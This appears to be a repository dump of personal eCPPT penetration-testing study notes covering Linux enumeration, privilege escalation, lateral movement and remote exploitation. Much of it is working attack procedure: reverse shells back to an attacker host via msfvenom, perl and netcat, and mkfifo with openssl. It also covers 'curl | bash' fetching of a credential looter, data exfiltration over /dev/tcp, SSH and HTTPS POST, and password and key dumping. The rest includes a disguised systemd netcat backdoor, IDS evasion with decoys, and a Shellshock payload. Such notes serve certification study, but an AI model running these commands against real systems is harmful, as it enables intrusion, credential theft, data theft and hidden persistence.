├── Banner Grabbing and OS Discovery.txt ├── Exploiting Linux.ctb ├── Firewall and IDS Evasion.txt ├── Linux Enumeration Remore Enumeration.txt ├── Linux Enumeration Remote and Local Enumeration.txt ├── Linux Post Exploitation.txt ├── Linux Remote Exploitation.txt ├── Low hanging fruit.txt ├── MITMf Python.txt ├── More NMAP Tricks eCPPT.txt ├── Network Security.ctb ├── Pillaging.txt ├── PowerShell Cont..txt ├── Powershell.txt ├── PrivEsc and Maintain Access.txt ├── Responder and MultiRelay MITM SMB hash attacks.txt ├── SMB Enumeration.txt ├── SNMP Enumeration.txt ├── SSH Tunneling.txt ├── XSS.txt ├── eCPPT Labs Network Security.ctb.pdf ├── eCPPT Labs.ctb ├── ineBurpSuite.txt ├── ineSQL.txt └── powershell finished.txt /Banner Grabbing and OS Discovery.txt: -------------------------------------------------------------------------------- 1 | Banner Grabbing 2 | 3 | There are a few tools for banner grabbing 4 | 5 | telnet and netcat 6 | 7 | If version is not shown within nmap scan you can try to do a banner grap utilizing telnet and netcat 8 | Another way to do this is try to log into the system, such as ssh 9 | ex: 10 | nc 10.10.10.1 22 11 | This will do a banner grap of port 22 on that IP address utilizing netcat 12 | 13 | OS Fingerprinting 14 | 15 | You can use NMAP 16 | 17 | Another tool you can use is P0f 18 | ./p0f -i eth0 19 | -------------------------------------------------------------------------------- /Exploiting Linux.ctb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/overgrowncarrot1/eCPPT-Notes/9ffd59cb5a94c7b70544cba67c81e8683a370d58/Exploiting Linux.ctb -------------------------------------------------------------------------------- /Firewall and IDS Evasion.txt: -------------------------------------------------------------------------------- 1 | Firewall / IDS Evasion 2 | 3 | nmap -sS -f 4 | -sS excutes a syn scan 5 | -f tells nmap to fragment packets 6 | Cannot use -f with -sT or -sV 7 | We can also use --mtu 8 | This is specify a custom offset size 9 | Offsets must be in a multiple of eight 10 | 11 | A way to fool analysts is by using decoys 12 | Decoys only work if they are up and running 13 | Should not send traffic from one at a time, however all of them should go at the same time 14 | This then hides the attackers IP with the decoy IPs to make it harder for analysts to know who attacked them 15 | 16 | nmap -sS -D , , , ME 17 | ME specifies to nmap where to put your IP address for your Kali machine 18 | If you do not specify NMAP will put you in a random spot 19 | 20 | You cannot use decoy with -sT or -sV 21 | 22 | TIMING 23 | 24 | To evade detection you may use timing 25 | -T0 paranoid 5 min 26 | -T1 sneaky 15 sec 27 | -T2 polite 0.4 sec 28 | -T3 normal default 29 | -T4 agressive 10 millisec 30 | -T5 insane 5 millisec 31 | 32 | Can also use max retries to not retry too many times 33 | --max-retries 1 34 | 35 | SOURCE PORT 36 | 37 | We can change the source port to utilize ports that are allowed by a firewall 38 | Most firewallys allow port 53, so we could use that and run a scan 39 | 40 | nmap -sS --source-port 53 41 | nmap -g 80 -sS 42 | 43 | Notice -g can also be used instead of --source-port 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /Linux Enumeration Remore Enumeration.txt: -------------------------------------------------------------------------------- 1 | Linux Enumeration 2 | 3 | Remote Enumeration: 4 | 5 | First try and see if the machine is linux based: 6 | 7 | nmap -O --osscan-guess 8 | 9 | nmap -v -sT -O 10 | 11 | nmap -v -sS -sU -sV -n 12 | 13 | Enumerating Network File System (NFS): 14 | 15 | nmap -sT -sU -sV -p2049 16 | 17 | Exports configured for any given NFS server can usually be found in the /etc/exports 18 | 19 | ls /usr/share/nmap/scripts/ | grep nfs 20 | nmap --script nfs-ls,nfs-showmount,nfs-statfs 21 | we can also use the showmount -e command, but it does not show as much information 22 | 23 | IF YOU FIND A EXPORT LIST WITH "*" YOU ARE GOLDEN AND THE IT PEOPLE ARE SCREWED 24 | YOU SHOULD SEE EXPORT LIST TO STOP ANYONE FROM EXPORTING 25 | 26 | Mounting NFS: 27 | 28 | mkdir -p /mnt/home/bob (or whatever the name is) 29 | mount -t nfs :/home/bob /mnt/home/bob -o noclock 30 | mount 31 | will show if mounting was successful 32 | cd /mnt/home/bob 33 | ls -la 34 | 35 | Portmapper (RPCBIND): 36 | 37 | This is port 111 (sometimes 32771) and commonly found on linux systems 38 | 39 | nmap --script rpc-grind,rpcinfo -p 111 40 | 41 | rpcinfo -p 42 | 43 | SMB (Samba): 44 | 45 | nmap -sT -sU -sV -p135,137,138,139,445 --open 46 | 47 | nmap --script smb-enum-shares,smb-enum-users 48 | 49 | smbclient -L 50 | 51 | smbmap -H 52 | 53 | smbclient \\\\\\ 54 | smbclient \\\\192.168.1.2\\www 55 | This may work if anonymous login is allowed, we should be able to see where it is allowed when utilizing the 56 | above scripts and arugments to enumerate SMB 57 | 58 | Another method for SMB Shares Mount: 59 | 60 | mkdir /mnt/www 61 | mount -t cifs \\\\192.168.1.2\\www /mnt/www 62 | you may need to download cifs with apt install cifs-utils 63 | cd /mnt/www 64 | ls -als 65 | 66 | Enmerating SMB Users: 67 | 68 | Using rpcclient and a potential list of usernames we may have already gathered from other phases 69 | 70 | Make a txt file with usernames in it 71 | make a base script 72 | #!/bin/bash 73 | for u in $(cat users.txt); 74 | do rpcclient -U "" 192.168.1.2 -N \ 75 | --command="lookupnames $u"; 76 | done | grep "User: 1" 77 | 78 | In the above command the -U is anonymous login, (shown by the "") 79 | the -N is no password (anonymous login) 80 | the lookupnames is a rpcclient command 81 | 82 | Now execute that bash code 83 | 84 | some other commands that are useful with RPC Client that you can put in your bash script 85 | lookupsids 86 | netshareenum 87 | srvinfo 88 | enumprivs 89 | 90 | Enum4Linux: 91 | 92 | Yet again another tool, and very easy to use, to enumerate SMB information 93 | Enum4Linux can enumerate the following: 94 | OS 95 | Users 96 | Password Policies 97 | Group Memberships 98 | Shares 99 | Domain/WOrkgroup Identification 100 | 101 | enum4linux 102 | 103 | Enumerating SMTP Users: 104 | 105 | THIS PART APPLIES FOR BOTH WINDOWS AND LINUX! 106 | 107 | nmap --script smtp-commands -p 25 108 | we can also directly connect to smtp 109 | nc 25 110 | telnet 25 111 | 112 | The different verbs (features) we are looking for is RCPT, VRFY and EXPN 113 | These different verbs can help to enumerate users 114 | 115 | connect through telnet 116 | use RCPT TO and then a users name 117 | RCPT TO bob@tester.localdomain 118 | then HELO with domain 119 | HELO tester.localdomain 120 | then MAIL FROM: 121 | tester@tester.localdomain 122 | now execute RCPT TO: 123 | valid users will return a status code of 250, invalid will be 550 124 | 125 | To use VRFY (which is what we have used the most up to this point on different boxes) 126 | 127 | telnet 192.168.1.2 128 | HELO foo 129 | VRFY james 130 | VRFY sara 131 | VRFY sara 132 | 133 | again a 250 is good, 500 is bad 134 | 135 | 136 | We can also use smtp-user-enum 137 | 138 | smtp-user-enum -M VRFY -U users.txt -t 192.168.1.2 139 | smtp-user-enum -M EXPN -u bob -t 192.168.1.2 140 | smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt 141 | smtp-user-enum -M EXPN -D example.com -U users.txt -t 192.168.1.2 142 | 143 | 144 | -------------------------------------------------------------------------------- /Linux Enumeration Remote and Local Enumeration.txt: -------------------------------------------------------------------------------- 1 | Linux Enumeration 2 | 3 | REMOTE ENUMERATION: 4 | 5 | First try and see if the machine is linux based: 6 | 7 | nmap -O --osscan-guess 8 | 9 | nmap -v -sT -O 10 | 11 | nmap -v -sS -sU -sV -n 12 | 13 | Enumerating Network File System (NFS): 14 | 15 | nmap -sT -sU -sV -p2049 16 | 17 | Exports configured for any given NFS server can usually be found in the /etc/exports 18 | 19 | ls /usr/share/nmap/scripts/ | grep nfs 20 | nmap --script nfs-ls,nfs-showmount,nfs-statfs 21 | we can also use the showmount -e command, but it does not show as much information 22 | 23 | IF YOU FIND A EXPORT LIST WITH "*" YOU ARE GOLDEN AND THE IT PEOPLE ARE SCREWED 24 | YOU SHOULD SEE EXPORT LIST TO STOP ANYONE FROM EXPORTING 25 | 26 | Mounting NFS: 27 | 28 | mkdir -p /mnt/home/bob (or whatever the name is) 29 | mount -t nfs :/home/bob /mnt/home/bob -o noclock 30 | mount 31 | will show if mounting was successful 32 | cd /mnt/home/bob 33 | ls -la 34 | 35 | Portmapper (RPCBIND): 36 | 37 | This is port 111 (sometimes 32771) and commonly found on linux systems 38 | 39 | nmap --script rpc-grind,rpcinfo -p 111 40 | 41 | rpcinfo -p 42 | 43 | SMB (Samba): 44 | 45 | nmap -sT -sU -sV -p135,137,138,139,445 --open 46 | 47 | nmap --script smb-enum-shares,smb-enum-users 48 | 49 | smbclient -L 50 | 51 | smbmap -H 52 | 53 | smbclient \\\\\\ 54 | smbclient \\\\192.168.1.2\\www 55 | This may work if anonymous login is allowed, we should be able to see where it is allowed when utilizing the 56 | above scripts and arugments to enumerate SMB 57 | 58 | Another method for SMB Shares Mount: 59 | 60 | mkdir /mnt/www 61 | mount -t cifs \\\\192.168.1.2\\www /mnt/www 62 | you may need to download cifs with apt install cifs-utils 63 | cd /mnt/www 64 | ls -als 65 | 66 | Enmerating SMB Users: 67 | 68 | Using rpcclient and a potential list of usernames we may have already gathered from other phases 69 | 70 | Make a txt file with usernames in it 71 | make a base script 72 | #!/bin/bash 73 | for u in $(cat users.txt); 74 | do rpcclient -U "" 192.168.1.2 -N \ 75 | --command="lookupnames $u"; 76 | done | grep "User: 1" 77 | 78 | In the above command the -U is anonymous login, (shown by the "") 79 | the -N is no password (anonymous login) 80 | the lookupnames is a rpcclient command 81 | 82 | Now execute that bash code 83 | 84 | some other commands that are useful with RPC Client that you can put in your bash script 85 | lookupsids 86 | netshareenum 87 | srvinfo 88 | enumprivs 89 | 90 | Enum4Linux: 91 | 92 | Yet again another tool, and very easy to use, to enumerate SMB information 93 | Enum4Linux can enumerate the following: 94 | OS 95 | Users 96 | Password Policies 97 | Group Memberships 98 | Shares 99 | Domain/WOrkgroup Identification 100 | 101 | enum4linux 102 | 103 | Enumerating SMTP Users: 104 | 105 | THIS PART APPLIES FOR BOTH WINDOWS AND LINUX! 106 | 107 | nmap --script smtp-commands -p 25 108 | we can also directly connect to smtp 109 | nc 25 110 | telnet 25 111 | 112 | The different verbs (features) we are looking for is RCPT, VRFY and EXPN 113 | These different verbs can help to enumerate users 114 | 115 | connect through telnet 116 | use RCPT TO and then a users name 117 | RCPT TO bob@tester.localdomain 118 | then HELO with domain 119 | HELO tester.localdomain 120 | then MAIL FROM: 121 | tester@tester.localdomain 122 | now execute RCPT TO: 123 | valid users will return a status code of 250, invalid will be 550 124 | 125 | To use VRFY (which is what we have used the most up to this point on different boxes) 126 | 127 | telnet 192.168.1.2 128 | HELO foo 129 | VRFY james 130 | VRFY sara 131 | VRFY sara 132 | 133 | again a 250 is good, 500 is bad 134 | 135 | 136 | We can also use smtp-user-enum 137 | 138 | smtp-user-enum -M VRFY -U users.txt -t 192.168.1.2 139 | smtp-user-enum -M EXPN -u bob -t 192.168.1.2 140 | smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt 141 | smtp-user-enum -M EXPN -D example.com -U users.txt -t 192.168.1.2 142 | 143 | LOCAL ENUMERATION: 144 | 145 | The type of information that we find here will fall into two different categories 146 | Network information 147 | System information 148 | 149 | NETWORK INFORMATION PHASE: 150 | 151 | ifconfig -a 152 | route -n 153 | arp -en 154 | traceroute -n (this will show how many hops to get somewhere else and see if there is another router 155 | netstat -auntp 156 | if netstat is not able to be used due to very restricted environments look at the following 157 | /proc/net/tcp 158 | /proc/net/udp 159 | ss -twurp (alternative to netstat to list established connections) 160 | 161 | To see what machine is resolving DNS queries 162 | 163 | cat /etc/resolv.conf 164 | 165 | To check outbound port connectivity restrictions we can do the following on the machine 166 | 167 | nmap -sT -p4444-4450 portquiz.net 168 | if the ports are open then we are good and there are not any restrictions 169 | 170 | 171 | SYSTEM INFORMATION PHASE: 172 | 173 | id 174 | uname -a (shows kernel version) 175 | grep $USER /etc/passwd (current user information) 176 | cat /etc/passwd 177 | cat /etc/shadow 178 | sudo -l 179 | cat /etc/sudoers 180 | lastlog (most recent logins) 181 | w (who is currently logged into the system) 182 | last (last logged on users) 183 | for user in $(cat /etc/passwd | cut -fl -d ":"); do id $user; done (Show all users UID and GID information) 184 | cat /etc/passwd | cut -fl,3,4 -d":" | grep "0:0" | cut -fl -d ":" | awk '{print $1}' (List all UID root accounts) 185 | cat /root/.bash_history 186 | find /home/* -name *.*history* -print 2> /dev/null (can we read other users bash history) 187 | cat /etc/issue (OS) 188 | cat /etc/*-release (OS) 189 | sudo -l | grep vim (sudo known binaries that allow breaking out in a shell) 190 | sudo -l | grep nmap (sudo known binaries that allow breaking out in a shell) 191 | sudo -l | grep vi (sudo known binaries that allow breaking out in a shell) 192 | ls -als /root/ (always try to list the root directory) 193 | echo $PATH (current $PATH environment variable) 194 | cat /etc/crontab && ls -als /etc/cron* (list all cron jobs) 195 | find /etc/cron* -type f -perm -o+w -exec ls -l {} \; (find world-writeable cron jobs) 196 | ps auxwww (list running processes) 197 | ps -u root (list all processes running as root) 198 | ps -u $USER (list all processes running as current user) 199 | find / -perm -4000 -type f 2>/dev/null (find SUID files) 200 | find / -uid 0 -perm -4000 -type f 2>/dev/null (find SUID files owned by root) 201 | find / -perm -2000 -type f 2>/dev/null (find GUID files) 202 | find / -perm 2 -type f 2>/dev/null (find world-writeable files) 203 | ls -la /etc/*.conf (list all conf files in /etc/) 204 | grep pass* /etc/*.conf (find conf files that contain the string "pass*" 205 | lsof -n (list open files) 206 | dpkg -l (list installed packages) 207 | 208 | COMMON SOFTWARE VERSIONS 209 | sudo -V 210 | httpd -v 211 | apache2 -v 212 | mysql -V 213 | sendmail -d0.1 214 | 215 | ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++' (print processes binaries / paths and permissions) 216 | 217 | WITH ALL THOSE COMMANDS ABOVE USE THE FOLLOWING TOOL TO AUTOMATICALLY DO THEM 218 | linenum 219 | linuxprivchecker 220 | unix-privesc-check 221 | mimipenguin (used to dump logon passwords for currently logged on users) 222 | 223 | 224 | -------------------------------------------------------------------------------- /Linux Post Exploitation.txt: -------------------------------------------------------------------------------- 1 | LINUX POST EXPLOITATION 2 | 3 | PRIVILEGE ESCALATION: 4 | 5 | System and Network Information 6 | 7 | Hostname 8 | 9 | hostname 10 | 11 | Kernel Version 12 | 13 | uname -a 14 | 15 | Operating System 16 | 17 | cat /etc/issue 18 | 19 | IP address 20 | 21 | ifconfig 22 | 23 | Running Processes 24 | 25 | ps auxw 26 | 27 | Network Routes 28 | 29 | route -n (find hidden networks) 30 | 31 | DNS Server 32 | 33 | cat /etc/resolv.conf (Zone Transfer, AD accounts) 34 | 35 | Arp Cache 36 | 37 | arp -a 38 | 39 | Current Network Configurations 40 | 41 | netstat -auntp (may be able to sniff traffic, or make other connections) 42 | 43 | User Information 44 | 45 | Current User Permissions 46 | 47 | find / -user username 48 | 49 | UID and GID Information for all users 50 | 51 | for user in $(cat /etc/passwd | cut -fl -d ":"); do id $user; done 52 | 53 | Last Logged on Users 54 | 55 | last -a 56 | 57 | Root Accounts 58 | 59 | cat /etc/passwd | cut -f1,3,4, -d":" | grep "0:0" | cut -fl -d":" | awk '{print $1}' 60 | 61 | Service Accounts 62 | 63 | cat /etc/passwd 64 | 65 | Home Directories 66 | 67 | ls -als /home/* 68 | 69 | Privileged Access / Cleartext Credentials 70 | 71 | sudo -l 72 | 73 | find / -perm -4000 -type f 2>/dev/null 74 | 75 | grep "password" /etc/*.conf 2> /dev/null 76 | 77 | grep -r password /etc/*.conf 2> /dev/null 78 | 79 | cat /etc/shadow 80 | 81 | ls -als /root 82 | 83 | find /* -name *.*history* -print 2> /dev/null (read other users' history files) 84 | 85 | touch /var/www/file (can we write to directories that are configured to serve web pages) 86 | 87 | find /* -name *.*history* -print 2> /dev/null (find dotfiles with "history" in their names) 88 | 89 | cat /var/log/apache/access.log | grep -E "^user|^pass" (get apache access.log file for "user" and "pass" strings 90 | 91 | cat /etc/NetworkManager/system-connections/* | grep -E "^id|^psk" (dump cleartext pre-shared wireless keys from network manager) 92 | 93 | Services 94 | 95 | netstat -auntp (may be able to sniff traffic, or make other connections) 96 | 97 | find /etc/init.d/ ! -uid 0 -type f 2>/dev/null | xargs ls -la (service configurations readable or modifialbe by our current user) 98 | 99 | cat /etc/mysql/my.cnf 100 | 101 | service service_name start/stop (can we start or stop different services) 102 | 103 | Jobs/Tasks 104 | 105 | cat /etc/crontab 106 | 107 | ls -las /etc/cron.* 108 | 109 | find /etc/cron* -type f -perm -o+w -exec ls -la {} \; (any custom jobs configured as root that are world writeable) 110 | 111 | Installed Software Version Information 112 | 113 | dpkg -l 114 | 115 | We can find a lot of this information within the LinEnum tool or LinPeas 116 | 117 | https://github.com/rebootuser/LinEnum 118 | 119 | Netcat File Transfer 120 | 121 | On local Kali Machine 122 | 123 | nc -w 3 1234 < LinEnum.sh 124 | 125 | On Target Machine 126 | 127 | nc -lp 1234 > LinEnum.sh 128 | 129 | chmod +x LinEnum.sh 130 | 131 | ./LinEnum.sh -h (will show help menu) 132 | 133 | ./LinEnum.sh -k (search for a keyword, such as password) 134 | 135 | 136 | Gathering Information with Metasploit 137 | 138 | msf> use post/linux/gather/enum_configs 139 | 140 | set session and then run 141 | 142 | msf> use post/linux/gather/enum_system 143 | 144 | Gaining information with Man 145 | 146 | If the user is allowed to run man we ran run it with a pager, thus allowing us to see files we shouldn't be able to 147 | 148 | sudo man -P "cat /etc/shadow" man 149 | 150 | CHROOT Jail (Rbash shell) 151 | 152 | run the ENV command to confirm we are in an Rbash shell 153 | 154 | If you can run binaries (such as VIM, NMAP, Less and so on) you can break out of the shell with !sh (in nmap remember it is nmap --interactive then !sh) 155 | 156 | vi /tmp/test 157 | !sh 158 | 159 | We can also use the find command to break out of restricted shells 160 | 161 | find /home/bob -name test -exec /bin/sh \; 162 | 163 | Utilizing the python full intergration shell can also break us out 164 | 165 | Using perl 166 | 167 | perl -e 'exec "/bin/sh";' 168 | 169 | We can also break out using SSH as long as we have the credentials 170 | 171 | ssh @ -t "/bin/sh" 172 | 173 | Using Unshadow 174 | 175 | unshadow > shadow.john 176 | 177 | john shadow.john --wordlist= 178 | 179 | MimiPenguin 180 | 181 | https://github.com/huntergregal/mimipenguin.git 182 | 183 | Used to obtain credentials from memory (used like mimikatz for windows, or kiwi) 184 | 185 | Tries to dump cleartext passwords from the following places 186 | 187 | GDM Passwordk (Kali Desktop, Debian Desktop) 188 | Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) 189 | VSFTPd (Active FTP Connections) 190 | Apache2 (Active HTTP Basic Auth Sessions) 191 | OpenSSH (Active SSH Sessions - Sudo Usage) 192 | 193 | There are 2 different MimiPenguin scripts, a shell and a python script 194 | 195 | Get MimiPenguin on the target machine and then ./mimipenguin 196 | 197 | Pilfering Credentials from Swap Memory 198 | 199 | swapon -s (shows us partitions) (can also use the cat /proc/swaps) 200 | 201 | strings (parition location) | grep "password=" 202 | 203 | strings /dev/sda5 | grep "password=" 204 | 205 | strings (parition location) | grep "&password=" 206 | 207 | strings /dev/sda5 | grep "&password=" 208 | 209 | RPATH and RUNPATH Exploits 210 | 211 | First we must determine if a program is utilizing RPATH or RUNPATH 212 | 213 | objdump -x /user/local/bin/program | grep RPATH 214 | 215 | objdump -x /user/local/bin/program | grep RUNPATH 216 | 217 | We will see where the program is pointing, which is usually a directory 218 | 219 | The program will look for shared objects (.so) files and run them 220 | 221 | This means that we could put a malicious .so file in the path the program is looking and hopefully it will run that program 222 | 223 | msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o program.so 224 | 225 | Now send that payload 226 | 227 | python -m SimpleHTTPServer 80 228 | 229 | On target machine 230 | 231 | cd && wget http:///program.so 232 | 233 | cd /tmp/program/libs && wget http://192.168.1.49/program.so 234 | 235 | Now start a listener 236 | 237 | msf> use exploit/multi/handler 238 | 239 | set payload linux/x64/shell_reverse_tcp 240 | set LHOST 241 | set LPORT 242 | run -j 243 | 244 | Now we can wait for the program to be executed, execute the program ourselves or hopefully, if we are lukcy it is being ran as a cron job with root and we get eleveated premissions and a reverse shell 245 | 246 | Kernel Exploits 247 | 248 | Dirty Cow 249 | Stack Clash 250 | DCCP Double-Free Privilege Escalation 251 | Race Condition Privilege Escalation 252 | 253 | searchsploit "linux kernel debian" 254 | 255 | We can also use linux exploit suggester 256 | https://github.com/mzet-/linux-exploit-suggester 257 | 258 | perl Linux_Exploit_Suggester.pl -k 2.6.38 (or whatever kernel you find) 259 | 260 | Remember to find the kernel version if you already have a shell 261 | 262 | uname -a 263 | 264 | If it is the UDEV < 1.4.1 - Local Privilege Escalation Exploit there is a video in this section that shows how to run that exploit 265 | 266 | For kernel exploits we usually need to compile them 267 | 268 | gcc --version (make sure gcc is installed) 269 | 270 | gcc -o exploit 271 | chmod +x exploit 272 | ./exploit (to run) 273 | 274 | If 32 bit and you need to compile 275 | 276 | gcc -m32 -o exploit 277 | 278 | Metasploit also has plenty of kernel exploits built into it 279 | 280 | The slides talk about exploit/linux/local/udev_netlink 281 | set session 282 | run 283 | 284 | Kernelpop 285 | 286 | This was new when the course was made, we can download it from the following 287 | 288 | https://github.com/spencerdodd/kernelpop 289 | 290 | Unix Socket Exploitation 291 | 292 | We can try to connect to a docker socket that is running as root as a nonroot user 293 | 294 | docker run -v /etc/shadow:/docker/hashedpasswords -d postgres 295 | docker exec -ti {CONTAINER_ID} bash 296 | cat /docker/hashedpasswords > /docker/test.txt 297 | chmod 777 /docker/test.txt 298 | cat /docker/test.txt 299 | 300 | 301 | LATERAL MOVEMENT: 302 | 303 | SSH Hijacking 304 | 305 | ps aux | grep sshd 306 | 307 | grep SSH_AUTH_SOCK /proc//environ 308 | 309 | SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXX/agent.XXXX ssh-add -l 310 | 311 | ssh remotesystem -l victim 312 | 313 | Stealing SSH Credentials 314 | 315 | use sshLooter 316 | 317 | https://github.com/mthbernardes/sshLooter.git 318 | 319 | On target machine 320 | 321 | curl http:// | bash 322 | 323 | Samba Secrets to Domain Admin 324 | 325 | When knew samba user is created the information is stored in a secrets.tdb file 326 | 327 | /var/lib/samba/private 328 | 329 | tdbdump /var/lib/samba/private/secrets.tbd 330 | 331 | We can then use the information for pass the hash with pth toolkit 332 | 333 | https://github.com/byt3bl33d3r/pth-toolkit 334 | 335 | For information on how to do this 336 | 337 | https://medium.com/@br4nsh/from-linux-to-ad-10efb529fae9 338 | 339 | VPNPivot 340 | 341 | Used to create a VPN tunnel between attackers and compromised linux hosts that may be behind firewalls or be use NAT 342 | 343 | https://github.com/0x36/VPNPivot 344 | 345 | Dumping Stored Firefox Credentials 346 | 347 | When firefox is launched it creates a default profile for the user 348 | 349 | /home/user/.mozilla/firefox (there should be a .default with random strings in front of it) 350 | 351 | Passwords are stored in the randomly named profile folder called logins.json and can be found with firefox_decrypt.py 352 | 353 | https://github.com/unode/firefox_decrypt 354 | 355 | The above tool only works if the Master Password has not been set 356 | 357 | 358 | DATA EXFILTRATION: 359 | 360 | Exfil over TCP Socket with EBCDIC and Base64 361 | 362 | First open a listener on attacker machine 363 | 364 | nc -lvnp 80 > datafolder.tmp 365 | 366 | On target system 367 | 368 | tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic /dev/tcp//80 369 | 370 | Now decode the information on the attacker machine 371 | 372 | dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar 373 | 374 | tar xf datafolder.tar 375 | 376 | Exfil over SSH 377 | 378 | Since SSH is encrypted it is less likely to be caught doing this 379 | 380 | On target system 381 | 382 | tar zcf - /tmp/datafolder | ssh root@ "cd /tmp; tar zxpf -" 383 | 384 | On attacker machine 385 | 386 | the information is ready to view in the tmp/datafolder 387 | 388 | If we want to be really stealthy we can configure ssh to use port 80, incase port 22 is being monitored 389 | 390 | Exfil via POST Request over HTTPS 391 | 392 | On attacker machine 393 | 394 | Make a contact.php file in /tmp/datafolder.base64 395 | 396 | 397 | 398 | On victim machine 399 | 400 | curl --data "$(tar zcf - /tmp/datafolder | base64)" https:///contact.php 401 | 402 | On attacker machine 403 | 404 | cat /tmp/datafolder.base64 | base64 -d > datafolder.tar && tar xf datafolder.tar 405 | 406 | MAINTAING ACCESS: 407 | 408 | MKFIFO Named Pipe 409 | 410 | Can be used to bypass different detection systems 411 | 412 | on attacker machine generate an SSL certificate 413 | 414 | openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes 415 | 416 | the above command will create a key.pem and cert.pem file both of which we will need 417 | 418 | openssl s_server -quiet -key key.pem -cert cert.pem -port 443 419 | 420 | On target system create mkfifo 421 | 422 | mkfifo /tmp/x; /bin/sh -i < /tmp/x 2>&1 \ 423 | | openssl s_client -quiet -connect :443 /tmp/x; rm /tmp/x 424 | 425 | ICMP Reverse Shell (icmpsh) 426 | 427 | Slides talk about this but do not show anything else, github 428 | https://github.com/bdamele/icmpsh 429 | 430 | Other sites 431 | 432 | https://highon.coffee/blog/reverse-shell-cheat-sheet/ 433 | http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 434 | 435 | 436 | Xinetd UDP Portknock Backdoor 437 | 438 | https://gist.github.com/anonymous/3cb8e474b6bb3fd3787bda1e1a55cf56 439 | 440 | Make sure to setup the above properly 441 | 442 | On attacker machine 443 | 444 | nc -lvnp 4444 445 | 446 | Now knock on the backdoor that was uploaded to the target system 447 | 448 | hping3 -2 -c 1 -p 65534 449 | 450 | Systemd Netcat Bind Shell 451 | 452 | On target system 453 | 454 | cp /bin/nc /lib/systemd/systemd-service 455 | 456 | Now create a file called systemd.service 457 | 458 | [Unit] 459 | Description = Systemd Service 460 | After = network.target 461 | [Service] 462 | ExecStart = /lib/systemd/systemd-service -lvp 56825 -e /bin/sh 463 | [Install] 464 | WantedBy = multi-user.target 465 | 466 | systemctl enable systemd.service 467 | systemctl start systemd.service 468 | 469 | On attacker machine 470 | 471 | nc 56825 472 | 473 | 474 | 475 | -------------------------------------------------------------------------------- /Linux Remote Exploitation.txt: -------------------------------------------------------------------------------- 1 | LINUX REMOTE EXPLOITATION: 2 | 3 | PASSWORD SPRAY ATTACK: 4 | 5 | Concept of using a list of as many users as possible with trying the same password 6 | A concept of this is used within eJPT black box when you use LETMEIN as the password and have a username list 7 | AKA Reverse Brute Force Attack 8 | 9 | Password Spray with smtp: 10 | 11 | Utilize the smtp-user-enum that we have learned in the last section 12 | 13 | https://github.com/insidetrust/statistically-likely-usernames 14 | 15 | Now that we have a username list we can use a metasploit module for password spray attacking 16 | 17 | msf > use auxiliary/scanner/smtp/smtp_enum 18 | set rhosts 19 | set user_file users.txt (or whatever you named it) 20 | run 21 | 22 | When completed we can create a list of valid_users.txt 23 | Now lets use some common passwords, put one at the most 2 passwords in the file 24 | things such as Spring2020 and letmein 25 | 26 | 27 | Lets see what other services we may be able to use password spraying against 28 | nmap -sT 192.168.1.2 --open --max-retries 1 -n 29 | Now that we have users (from smtp) and some services we can use hydra to attack the target 30 | After we find a target we can see what other computers that user may be able to login to 31 | We can also use hydra to see a larger amount of servers (lets say there are a few computers running ssh) 32 | hydra -l david -p Spring2018 -M ssh_servers.txt ssh (ssh_servers.txt is a file containing different IP addresses, one per line that have ssh enabled) 33 | We can also use Metasploit's smb_login scanner module to try to login to SMB services 34 | metasploit also has an owa_login that can be used (this is in the slides may be in the test) 35 | 36 | EXPLOITING SAMBA: 37 | 38 | Samba Usermap Script: 39 | 40 | nmap --script smb-os-discovery -p445 192.168.1.2 41 | This should show us the Samba version 42 | We can then use that information to look on searchsploit, in metasploit or on google 43 | Within the slides they talk about username map script exploitation 44 | use exploit/multi/samba/usermap_script 45 | set rhost 46 | set lhost 47 | run 48 | 49 | Samba Symlink Directory Traversal: 50 | 51 | smbmap -H 192.168.1.2 52 | Look for read and write access 53 | msf > use auxiliary/admin/smb/samba_syslink_traversal 54 | set rport 55 | set rhost 56 | set SBMSHARE (which ever had read/write access) 57 | set SMBTARGET rootfs (the root file system) 58 | run 59 | smbclient \\\\192.168.1.2\\(access shared) -N 60 | smbclient \\\\192.168.1.2\\tmp -N 61 | you should now see rootfs directory in that share 62 | now login to smb 63 | cd to rootfs and you can use get and put commands 64 | cd etc 65 | get passwd 66 | get shadow 67 | We can also use the tar command (when in smb) 68 | tar c ../tmp/all_files.tar * 69 | this will download all the files to the local machine 70 | on local machine tar xf /tmp/allfiles.tar 71 | grep -r "password" * 2>&1 /dev/null 72 | hopefully we can find some passwords that way 73 | If you find index.pl in a www share, there are things we can do with that 74 | index.pl is a perl script 75 | we can get that index.pl and then use cat to see what it contains 76 | first try to put something in the smb server 77 | in kali make a test.pl then on smb do put test.pl 78 | if successful then we can put files 79 | in the perl file we can put something like the following just to make sure 80 | #!/usr/bin/perl 81 | print "Content-type: text/html\n\n"; 82 | system("id"); 83 | now go to the web server 84 | 192.168.1.2/test.pl 85 | you should get the id information 86 | Now we can try and get a reverse shell using perl 87 | http://pentestmonkey.net/tools/web-shells/perl-reverse-shell 88 | Open a listener with netcat 89 | nc -lvnp 1234 90 | Go to webpage 91 | 192.168.1.2/rev.pl 92 | We should get a reverse shell 93 | Another way to do the above 94 | We could also do this without using pentest monkey 95 | in our test.pl file change it to have it connect back to us 96 | #!/usr/bin/perl 97 | print "Content-type: text/html\n\n"; 98 | system ("nc 192.168.1.49 1234 -e /bin/sh"); 99 | 100 | EXPLOITING SHELLSHOCK: 101 | 102 | First we are going to use dirsearch 103 | dirsearch.py -u http://192.168.1.2/ -e cgi -r 104 | Find cgi files that we can go to, such as /cgi-bin/login.cgi 105 | Now we can use an nmap script to see if this is vulnerable to shellshock 106 | nmap --script http-shellshock --script-args uri=/cgi-bin/login.cgi 192.168.1.2 -p 80 107 | Now to exploit shellshock 108 | wget -U () { foo;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" 